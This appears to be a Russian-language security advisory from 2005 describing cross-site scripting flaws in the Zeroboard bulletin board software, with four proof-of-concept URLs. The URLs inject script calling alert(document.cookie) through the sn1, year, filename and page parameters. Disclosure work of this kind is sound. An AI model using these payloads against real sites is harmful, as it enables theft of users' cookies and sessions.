Межсайтовый скриптинг в Zeroboard

Дата публикации:
21.02.2005
Всего просмотров:
4406
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Zeroboard

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к важной информации пользователей.

Уязвимости обнаружены в параметре sn1 функции gallery(), параметре year функции union_schedule(), параметре filename функции view_image.php и параметре page функции id(). Удаленный пользователь может с помощью специально сформированного URL произвести XSS нападение и получить доступ к важной информации пользователей.

Пример/Эксплоит:

http://[target]/dir/zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E%
3Cscript%3Ealert(docume nt.cookie)%3C/script%3E

http://[target]/zboard/zboard.php?
id=union_schdule&year=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E

http://[target]zboard/skin/dir/view_image.php?
filename=ALBANIA N%20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%
3C/script%3E

http://[target]/zboard/zboard.php?id=link&page=ALBANIAN%
20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

URL производителя: http://www.zeroboard.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Multiple Vulnerabilities in ZeroBoard

или введите имя

CAPTCHA